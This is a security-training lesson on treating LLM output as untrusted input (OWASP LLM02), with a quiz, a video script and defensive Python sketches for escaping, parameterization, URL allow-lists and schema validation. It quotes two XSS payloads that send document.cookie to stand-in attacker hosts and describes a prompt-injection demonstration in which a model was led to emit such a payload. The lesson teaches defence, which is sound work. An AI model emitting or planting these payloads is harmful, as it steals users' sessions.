L3.3.1: Model output is untrusted input

Type: Theory · Duration: ~5 min · Status: Mandatory
Module: Module 3, Prompt Injection & LLM Application Attacks
Framework tags: OWASP LLM02 (Insecure Output Handling) · MITRE ATLAS AML.T0048

Learning objectives

State the "model output is untrusted input" principle and recall the four downstream-injection patterns it enables.
Identify the primary defense pattern (structured output) and one fallback.

Core content

The principle

For the purposes of any system downstream of it, a trained LLM is an untrusted source. Once the model is reachable by external input (which, in any deployed application, it is), its outputs can be steered by a sufficiently crafted input. Treat model outputs the same way you treat user-supplied form data: encode, parameterize, validate, sandbox.

This is OWASP LLM02 (the 2023 numbering; the 2025 list renames the entry Improper Output Handling and moves it to LLM05), and it is the most common second link in real exploit chains. With LLM01 (prompt injection), the attacker gets the model to emit a payload. With LLM02 (insecure output handling), the system around the model treats that payload as trustworthy.

The four downstream-injection patterns

Wherever your code passes model output into another interpreter, you have a potential injection class. Four come up constantly:

1. XSS via rendered output. Model output is rendered into HTML and displayed to the user. Model emits <script>fetch('//evil.example/log?c='+document.cookie)</script>. Defense: HTML-escape model output before rendering. Same rule that applies to user-supplied content.

2. SQL injection via formatted queries. Model output is interpolated into a SQL query (sometimes legitimately — text-to-SQL features — sometimes accidentally). Defense: never interpolate model output directly into SQL. Use parameterized queries with the model output as a value, not a fragment. For text-to-SQL, use a parser/validator on the generated SQL and an allow-list of permitted operations.

3. SSRF via auto-fetched URLs. Model output contains a URL that the application fetches (e.g., to render link previews, fetch referenced resources, follow citations). Defense: an allow-list of permitted hosts, a block-list of internal and link-local IP ranges checked against the resolved address (not just the hostname), and a strict timeout and content-type policy.

4. Command injection via tool/shell calls. Model output is interpolated into a shell command, eval'd, or passed to a tool that itself interprets the input as code. Defense: never shell out with model output as the command source. If a tool needs to take an action, the model should select a structured action, not author the command.
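Patterns 3 and 4 have the least mechanical defenses, so a minimal Python sketch may help. It assumes a hypothetical host allow-list (ALLOWED_HOSTS) and a hypothetical action table (ACTIONS); the function names is_fetchable, build_argv, and run_action are illustrative and do not come from any library. The resolver is passed in as a parameter so the check can be exercised without network access.

```python
import ipaddress
import socket
import subprocess
from urllib.parse import urlsplit

# Assumption: hosts this application is permitted to fetch from.
ALLOWED_HOSTS = {"docs.example.com", "cdn.example.com"}

# Assumption: the model selects a key; the application owns the argv.
ACTIONS = {
    "disk_usage": ["df", "-h"],
    "uptime": ["uptime"],
}


def is_fetchable(url, resolve=socket.getaddrinfo):
    """True only for https URLs on an allow-listed host whose
    resolved addresses are all globally routable."""
    try:
        parts = urlsplit(url)
        port = parts.port or 443
    except ValueError:
        return False  # malformed URL or port
    if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
        return False
    try:
        infos = resolve(parts.hostname, port)
    except OSError:
        return False  # DNS failure: refuse rather than guess
    if not infos:
        return False
    for info in infos:
        try:
            addr = ipaddress.ip_address(info[4][0])
        except ValueError:
            return False
        # Blocks private, loopback, and link-local (metadata) ranges.
        if not addr.is_global:
            return False
    return True


def build_argv(action):
    """Map a model-selected action name to a fixed argument vector."""
    if action not in ACTIONS:
        raise ValueError(f"action not permitted: {action!r}")
    return list(ACTIONS[action])


def run_action(action):
    """Run an allow-listed action without a shell."""
    return subprocess.run(
        build_argv(action), capture_output=True, text=True, timeout=5, check=False
    )
```

This sketch does not close the gap between the check and the fetch (DNS rebinding, redirects); a real fetcher would likely need to connect to the address it validated and re-check every redirect hop.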

The primary defense: structured output

The cleanest mitigation across all four patterns: never let the model emit free-form text where you need a structured value. Use:

JSON schema enforcement: most providers support this directly (OpenAI's response_format, Anthropic's tool use, llama.cpp's grammars). The model is constrained to emit JSON matching a schema; non-conformant output is rejected.
Function calling / tool selection: the model picks from a defined list of operations with typed parameters, instead of authoring free-form code.
Allow-listed responses: for narrow interfaces, the model picks from a fixed set of strings ({"refund": "approved"|"denied"|"escalate"}).
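Even when the provider enforces a schema, it is cheap to re-validate on the application side. The following is a minimal sketch of the refund allow-list above, using only the standard library; the function name parse_refund_decision and the constant ALLOWED_REFUND are hypothetical names chosen for illustration.

```python
import json

# The fixed set of values the interface accepts (from the example above).
ALLOWED_REFUND = {"approved", "denied", "escalate"}


def parse_refund_decision(raw):
    """Return the decision string, or raise ValueError if the model
    output is anything other than {"refund": <allowed value>}."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise ValueError("model output is not valid JSON") from exc
    # Exactly one key, no extras the downstream code might pick up.
    if not isinstance(data, dict) or set(data) != {"refund"}:
        raise ValueError("model output has an unexpected shape")
    decision = data["refund"]
    if not isinstance(decision, str) or decision not in ALLOWED_REFUND:
        raise ValueError("refund decision is not an allowed value")
    return decision
```

Downstream code then branches on the returned value only, so an injected string such as "approved; DROP TABLE orders" never reaches another interpreter.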

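Structured output collapses the attack surface by removing the medium of attack. An attacker can still try to inject, but the only thing they can inject is something the schema allows. That guarantee is only as tight as the schema: a free-form string field is still untrusted text and needs boundary sanitization wherever it lands.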

The fallback: output sanitization at the boundary

When structured output isn't possible (free-form chat replies, summarization, etc.), the fallback is boundary sanitization — encode for the downstream interpreter at the moment of crossing. Render to HTML? HTML-escape. Pass to SQL? Parameterize. Fetch as URL? Allow-list. Treat the boundary as you would treat any classical-AppSec sink.
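For the HTML and SQL boundaries, the standard library is enough for a minimal sketch. The function names render_reply and find_orders, the wrapper markup, and the orders table are assumptions made up for illustration.

```python
import html
import sqlite3


def render_reply(model_output):
    """Escape at the HTML boundary: markup in the model output
    becomes inert text inside the wrapper element."""
    return '<div class="reply">' + html.escape(model_output) + "</div>"


def find_orders(conn, customer_name):
    """Parameterize at the SQL boundary: the model-derived value is
    bound as data and is never parsed as part of the statement."""
    cur = conn.execute(
        "SELECT id, item FROM orders WHERE customer = ?",
        (customer_name,),
    )
    return cur.fetchall()
```

In both functions the encoding happens at the sink, not where the model output is received, so a value that passes through several layers is still handled correctly for the interpreter it finally reaches.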

What this is NOT

Output sanitization does not defend against prompt injection itself. It defends against the consequences of prompt injection on downstream systems. The model is still being injected; the model is still emitting whatever the attacker wants. You are bounding the damage that emission can do. That's defense-in-depth working correctly: assume the upstream layer (prompt-injection defense) sometimes fails, and don't let the failure propagate.

Real-world example

A 2023 demonstration by Embrace The Red showed an LLM-powered chat app in which prompt injection induced the model to emit <img src=x onerror="fetch('//attacker.example/?'+document.cookie)">. The renderer trusted the output, and session cookies were exfiltrated. HTML-escaping model output would have prevented this, but the developer never considered model output a hostile source. This is the prototypical LLM02 finding, and findings of the same shape have shipped against many products since.

Key terms

Boundary sanitization — encoding/escaping at the point output crosses into another interpreter.
Structured output — constraining the model to emit JSON/typed values matching a schema.
Defense-in-depth principle for LLM02 — assume PI defenses fail; bound the damage on emission.

References

OWASP LLM02 page.
OpenAI structured output (response_format) — https://platform.openai.com/docs/guides/structured-outputs
Anthropic tool use — https://docs.anthropic.com/en/docs/tool-use
Simon Willison's "model output is just like user input" essays.

Quiz items

Q: State the principle that defines OWASP LLM02 in one sentence. A: Model output is untrusted input for any system downstream of the LLM, and must be encoded/parameterized/validated/sandboxed at every boundary it crosses.
Q: A user-facing LLM chat product renders model output as HTML. What's the minimum-bar mitigation against LLM02? A: HTML-escape model output before rendering.
Q: Why is "structured output" the cleanest defense pattern? A: It removes the medium of attack — the attacker can only inject things the schema allows, collapsing the attack surface.

Video script (~600 words, ~4.5 min)

[SLIDE 1 — Title]

Model output is untrusted input. Five minutes. By the end you'll know the LLM02 principle, four downstream-injection patterns, and two defense patterns.

[SLIDE 2 — The principle]

A trained LLM is — for the purposes of any system downstream of it — an untrusted source. Once the model is reachable by external input — which it always is — its outputs can be steered by a sufficiently crafted input. Treat model outputs the same way you treat user-supplied form data. Encode. Parameterize. Validate. Sandbox.

This is OWASP LLM02. It is the most common second link in real exploit chains. LLM01 tells the model to emit a payload. LLM02 is the system around the model treating that payload as trustworthy.

[SLIDE 3 — Four downstream-injection patterns]

Four downstream-injection patterns. Wherever your code passes model output into another interpreter, you have a potential injection class.

One: XSS via rendered output. Model emits a script tag. Renderer trusts it. Cookies exfiltrated. Defense: HTML-escape model output before rendering.

Two: SQL injection via formatted queries. Model output is interpolated into SQL — sometimes legitimately, text-to-SQL features, sometimes accidentally. Defense: never interpolate model output directly into SQL. Use parameterized queries with the model output as a value, not a fragment. For text-to-SQL, parser-validate plus an allow-list of permitted operations.

Three: SSRF via auto-fetched URLs. Model output contains a URL the application fetches — link previews, referenced resources, followed citations. Defense: URL allow-list, internal-IP block-list, timeout and content-type policy.

Four: command injection via tool or shell calls. Model output is interpolated into a shell command, eval'd, or passed to a tool that interprets the input as code. Defense: never shell-out using model output as command source. If a tool needs to take an action, the model should select a structured action, not author the command.

[SLIDE 4 — Primary defense: structured output]

Primary defense across all four patterns: structured output. Never let the model emit free-form text where you needed a structured value. JSON schema enforcement — most providers support this directly. OpenAI response-format, Anthropic tool-use, Llama-cpp grammars. The model is constrained to emit JSON matching a schema. Non-conformant output is rejected. Function calling — the model picks from a defined list of operations with typed parameters. Allow-listed responses — for narrow interfaces, the model picks from a fixed set of strings.

Structured output collapses the attack surface by removing the medium of attack. An attacker can still try to inject. But the only thing they can inject is something the schema allows.

[SLIDE 5 — Fallback: boundary sanitization]

When structured output isn't possible — free-form chat replies, summarization — the fallback is boundary sanitization. Encode for the downstream interpreter at the moment of crossing. Render to HTML, HTML-escape. Pass to SQL, parameterize. Fetch as URL, allow-list. Treat the boundary as you would treat any classical-AppSec sink.

[SLIDE 6 — What this is NOT]

Output sanitization does not defend against prompt injection itself. It defends against the consequences of prompt injection on downstream systems. The model is still being injected. The model is still emitting whatever the attacker wants. You are bounding what damage that emission can do. That's defense-in-depth working correctly. Assume the upstream layer sometimes fails. Don't let the failure propagate.

[SLIDE 7 — Up next]

Next: excessive agency. Two lessons. Then system-prompt extraction. Then four labs. See you there.

Slide outline

Title — "Model output is untrusted input".
The principle — diagram: LLM as a faucet with attacker hand on it; downstream systems as buckets to be protected.
Four downstream-injection patterns — quadrant: XSS · SQLi · SSRF · cmd-i, each with mini code-sample.
Primary defense: structured output — JSON schema example + "constrained to allowed values" callout.
Fallback: boundary sanitization — sink-by-sink defense table.
What this is NOT — diagram: PI defense failed (red X) → output handling defense holds (green check).
Up next — "L3.4.1 — Excessive agency, ~5 min."

Production notes

Recording: ~4.5 min. Cap 5.
Slide 6 lands the defense-in-depth principle; emphasize that LLM02 isn't a PI defense but is the safety net.